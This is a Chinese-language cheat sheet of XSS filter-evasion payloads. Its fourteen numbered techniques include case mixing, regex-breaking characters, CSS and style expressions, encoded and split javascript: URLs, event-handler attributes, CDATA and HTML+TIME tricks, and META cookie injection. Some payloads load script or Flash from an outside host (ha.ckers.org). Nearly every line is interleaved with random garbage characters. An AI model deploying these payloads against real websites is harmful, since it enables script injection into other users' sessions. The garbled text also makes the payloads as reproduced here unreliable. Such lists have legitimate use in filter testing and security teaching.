1. 改变字符大小写9 c" c' ?2 r, s `
. z4 ?: }; r' M 5 s9 t: P! I9 Y( F5 P* ~
# C% o% }( M# g( ?# l7 v9 O <sCript>alert(‘d’)</scRipT>! `+ K7 A* k$ o* j: k* n. I6 t
( X7 ?8 V% V3 q' \7 g/ e4 V2. 利用多加一些其它字符来规避Regular Expression的检查
3 k- `. {4 k/ b+ n# {1 J. `* U! T3 Y7 ^5 u
<<script>alert(‘c’)//<</script>
6 R9 C* `" W/ A& p5 t( {
* E( [: F) O6 x. R9 W <SCRIPT a=">" SRC="t.js"></SCRIPT>
" O; K; [5 v8 l$ m v
, ?5 @$ }" }5 X8 f <SCRIPT =">" SRC="t.js"></SCRIPT>
' C% Z v' |6 A/ _0 ]: D/ z( B5 Z$ l5 {3 P
<SCRIPT a=">" ” SRC="t.js"></SCRIPT>
+ {& N2 {" l& [$ {; V5 H$ K/ w- D! N3 U; F' _% K
<SCRIPT "a=’>’" SRC="t.js"></SCRIPT>& F2 i% H& h" r4 ^* C
, l, g) e6 v) j8 F L( s <SCRIPT a=`>` SRC="t.js"></SCRIPT>
+ k, h6 b8 h* c N$ L$ F, x# \1 U! a; S* M; E8 l* f! s- J# I9 G
<SCRIPT a=">’>" SRC="t.js"></SCRIPT>& K% c# I$ S4 i, a3 K& O0 c
6 \3 L# [$ |& h! S( D
3. 以其它扩展名取代.js
1 ^' f) r' N% y" ]8 `
% o/ q1 ?8 k$ m <script src="bad.jpg"></script>
% ]! U( x0 J/ h0 ~/ m) O
7 K! _. x; I5 [7 x8 ^9 h3 g/ ^! n4. 将Javascript写在CSS档里
4 d) s$ B& }+ e, z8 X; Q" W3 d8 v* ?
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
' E2 t9 b( I3 e9 I; z
7 Y q/ V4 z7 [0 Q, Q! \ e$ r0 N, f7 ? example:
W2 M* ^' ]; h6 {& i# z& O5 A" s, G7 X0 l8 J! i# N
body {
: w$ {3 `1 ?" \# J: L* s: K. }+ w5 m
background-image: url(‘javascript:alert("XSS");’)
! Q+ T, Q. I$ `; I/ @# ~8 m4 I1 `( U7 V3 D1 A
}# U+ s& j& Q# Y# K8 f& u
( m% b1 L0 Y0 P4 n8 C( @: k& y5. 在script的tag里加入一些其它字符
+ ^& u; `4 S5 k) c& @
1 r6 m5 F0 F8 F- Y2 x8 l' T8 o <SCRIPT/SRC="t.js"></SCRIPT>* q/ q% `" G5 s% d9 a% e
/ }( _% k# ^* K
<SCRIPT/anyword SRC="t.js"></SCRIPT>
! G3 b4 I: ~$ F1 v# d
. C% }$ L9 E, x6. 使用tab或是new line来规避
% k: l& |! G) @% r8 ^/ Y# j9 s$ p9 D3 S/ H* o3 c
<img src="jav ascr ipt:alert(‘XSS3′)">
5 _* ?2 h j& L- a) Y4 z0 Y5 j' F! x4 g
<img src="jav ascr ipt:alert(‘XSS3′)">; l* A6 d! a" K. q3 R0 N
. [; \5 U$ h; R- I) i
<IMG SRC="jav ascript:alert(‘XSS’);"># l# O, T# q( @7 |+ v4 ^
9 Z9 N. `7 m2 h3 T5 T* o. U! }2 d
-> tag" k" l3 K% j$ o r4 N
" ?: H! K5 N7 i4 U$ w0 b' w
-> new line
# W3 R( o5 w* h) l! s
D; o$ f* P9 ]7. 使用"\"来规避/ @3 e& l0 `! _$ e4 y
# F$ o' N/ l5 S9 h0 L# y* O- s <STYLE>@im\port’\ja\vasc\ript:alert("XSS32")’;</STYLE>& m: ^" ]$ |" N
, o: g/ L2 [; m) o9 i$ k <IMG STYLE=’xss:expre\ssion(alert("XSS33"))’>
# N- ?: |; @* ]- U
5 {, p7 ?, ^- I0 e6 V3 ?0 ~7 t. ?2 w <IMG STYLE="xss:expr/*anyword*/ession(alert(‘sss’))">
4 o- R H1 g0 h$ |6 R3 z/ y8 z, b. M u4 L& g) @- u
<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
( x0 {" J4 I$ _) h$ s# p& M6 L6 B" ]# o+ c! n, T
<A STYLE=’no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))’>7 I8 |6 Z& d5 ]6 Q" u
9 ~ g; S! l" r) C: l
8. 使用Hex encode来规避(也可能会把";"拿掉)
4 w. j" S6 f% w' j# M B8 v+ y5 s) |+ E3 v
<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">+ ^* Z7 m# E8 V1 ^
) @) U5 n3 U% j" P) d8 H; V
原始码:<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">7 N9 C1 i2 J0 r/ h. C
. X5 y# e4 n0 E$ Z3 V3 f
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">
& X1 U4 P$ `: L) @( t- d" I3 l$ ~. E9 k# ?0 F3 W
原始码:<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">
! S& e. q( ^. ]- Z- h. ?% q. L0 ?- h
9. script in HTML tag( ]% [2 L* r5 f G2 y3 j
, Y% g7 i' x# @% V; G0 a
<body onload=」alert(‘onload’)」>
( M9 w. _* l; _( K# a
. u0 P- f" g! U7 W; d8 Z3 a onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload R) ?7 @6 A- x+ @' ~- q3 w
8 l6 C- L( M a& | t7 U$ V5 w10. 在swf里含有xss的code2 G' E4 A# n% k2 {- f( N
5 p8 y- H; l9 I2 @, M: S
<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>1 r% v; T* H' I* n2 R! Y! U" Z
! ?- h6 b$ b0 d+ z1 y- z' T11. 利用CDATA将xss的code拆开,再组合起来。
& M: o% r0 s/ N
. w' [8 ^9 F. Q% D <XML ID=I><X><C>
- y7 b' p) P( \& ^# v+ H: ^! B: x% }, u$ z" T v
<![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
" j: D+ K$ D4 O" {; s$ ^2 b6 u+ ] s1 G- J
</C></X># o8 `* h# G4 ^* y6 P. g, ?
5 n( |: x8 Z" w. O- w) s# e/ u
</xml>& _; ]4 V" {6 u# {9 y/ C% E1 Y/ r1 b! R
3 M, ?8 H2 |3 C
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>" `( R9 @7 {! A& W% M2 x O8 e
8 R: F6 s9 y# h# Z | <XML ID="xss"><I><B><IMG SRC="javas<!– –>cript:alert(‘XSS’)"></B></I></XML>
h) Z/ H: c6 x, Y6 ?" R+ ^% Q8 [' Q% g
<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>+ |3 p7 \4 u7 I* }- P
- H c' ~! s# ?6 t2 T# F0 D: ~12. 利用HTML+TIME。* M8 [4 l0 I/ }- ? j; d# i ?
- i! q8 H& B! y, n# C
<HTML><BODY>
! B0 t3 \4 W0 G8 u
) `- g' S: H3 J3 F <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
* Y$ z9 X: P* c4 B- W
5 }. s, O9 v- s( p/ d <?import namespace="t" implementation="#default#time2">
" ^) G! H5 O7 h$ r, m# ~# ^2 }0 L8 g+ y$ s6 a) X1 b
<t:set attributeName="innerHTML" to="anyword<SCRIPTDEFER>alert("XSS")</SCRIPT>"> f0 f, Q: t; W% ]; |3 s/ Q* K2 W
5 [0 R1 X8 R2 E' F& M
</BODY></HTML>! ~' A- |3 R5 |
( T' r& S+ u, f2 i+ H6 D+ t
13. 透过META写入Cookie。
6 R* d; p5 K2 e( K9 t+ O4 s+ B8 X# Q) g9 G, x2 d/ Q" V
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>"># B/ C; ]. r% s3 m+ c5 H
~; u: a3 ?" ]
14. javascript in src , href , url
' U2 }) _8 p2 z, w! X7 c
- ]$ ]5 I$ \9 k" C7 s <IFRAME SRC=javascript:alert(’13′)></IFRAME>
, I) x3 f, x9 P: H K
2 ] t. f4 D% ^7 Z' s <img src="javascript:alert(‘XSS3′)">
: b9 \+ `' e8 C& }
5 \9 E: n) a! O. N<IMG DYNSRC="javascript:alert(‘XSS20′)">7 v- s2 J9 U* E" O( T0 \! h
/ ^/ Y: M. {3 o9 M1 v+ q
<IMG LOWSRC="javascript:alert(‘XSS21′)">1 R" e, J& N# z }% m( p+ l3 Z4 i
/ f$ A, x' N2 S/ R q( d! M
<LINK REL="stylesheet" HREF="javascript:alert(‘XSS24′);">
/ H, D" E/ t7 K/ p, B {
9 T! @/ g6 K f+ H$ d( }9 d9 l <IFRAME SRC=javascript:alert(‘XSS27′)></IFRAME>
' R7 b, P, ^: q$ f1 R
7 f: i% T) j& T; N C/ J& r% B <TABLE BACKGROUND="javascript:alert(‘XSS29′)">
4 p& M( Q3 ~ B( n" [! M% V1 r, F" {+ j' L% x& S! _* D
<DIV STYLE="background-image: url(javascript:alert(‘XSS30′))">
9 n8 e( c) _) m& K# \
- S: l3 R2 O- M! M <STYLE TYPE="text/css">.XSS{background image:url("javascript:alert(‘XSS35′)");}( [! K$ E( ?; f! m0 A% F" x# H
- i) u9 |% A" n% X7 d </STYLE><A CLASS=XSS></A>
6 @- }& c9 q9 I& f o/ {/ d7 I. Z- H* f/ S- n4 Q M7 `/ s' ?6 o
<FRAMESET><FRAME SRC="javascript:alert(‘XSS’);"></FRAMESET>
& a4 j( g. z. T. L/ F- j& `3 C4 Y/ B" y/ K, r+ @5 S9 n" v
|